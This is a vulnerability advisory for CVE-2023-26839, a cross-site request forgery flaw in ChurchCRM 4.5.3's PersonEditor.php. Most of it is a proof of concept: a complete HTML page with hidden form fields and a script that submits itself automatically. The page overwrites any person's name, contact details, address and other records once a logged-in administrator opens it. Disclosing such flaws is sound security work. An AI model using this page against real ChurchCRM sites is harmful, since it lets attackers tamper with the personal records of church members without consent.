CVE-2023-26839 - Cross-Site Request Forgery (CSRF) via PersonEditor.php
| Researchers | 10splayaSec |
| Severity | 6.9 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:H/A:N) |
| Published | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26839 |
| Software Link | https://github.com/ChurchCRM/CRM |
Description
A cross-site request forgery (CSRF) vulnerability in ChurchCRM 4.5.3 allows attackers to edit information from existing people on the site.
Proof of Concept
- Using the HTML below, we can change data of any person on the site. This includes First, Last, Middle name, email address, State, City, and more.
<html>
<body>
<form method="POST" action="http://<URL>/churchcrm/PersonEditor.php?PersonID=<ID>">
<input type="hidden" name="Gender" value="0"/>
<input type="hidden" name="Title" value=""/>
<input type="hidden" name="FirstName" value="<FIRST NAME>"/>
<input type="hidden" name="MiddleName" value="<MIDDLE NAME>"/>
<input type="hidden" name="LastName" value="<LAST NAME>"/>
<input type="hidden" name="Suffix" value=""/>
<input type="hidden" name="BirthMonth" value="10"/>
<input type="hidden" name="BirthDay" value="12"/>
<input type="hidden" name="BirthYear" value="2022"/>
<input type="hidden" name="FamilyRole" value="0"/>
<input type="hidden" name="Family" value="0"/>
<input type="hidden" name="Address1" value=""/>
<input type="hidden" name="Address2" value=""/>
<input type="hidden" name="City" value=""/>
<input type="hidden" name="State" value=""/>
<input type="hidden" name="StateTextbox" value=""/>
<input type="hidden" name="Zip" value=""/>
<input type="hidden" name="HomePhone" value=""/>
<input type="hidden" name="WorkPhone" value=""/>
<input type="hidden" name="CellPhone" value=""/>
<input type="hidden" name="Email" value=""/>
<input type="hidden" name="WorkEmail" value=""/>
<input type="hidden" name="Facebook" value=""/>
<input type="hidden" name="Twitter" value=""/>
<input type="hidden" name="LinkedIn" value=""/>
<input type="hidden" name="Classification" value="0"/>
<input type="hidden" name="MembershipDate" value=""/>
<input type="hidden" name="FriendDate" value="2023-02-03"/>
<input type="hidden" name="PersonSubmit" value="Save"/>
<input type="submit" value="Submit">
</form>
</body>
<script>
document.forms[0].submit()
</script>
<html>
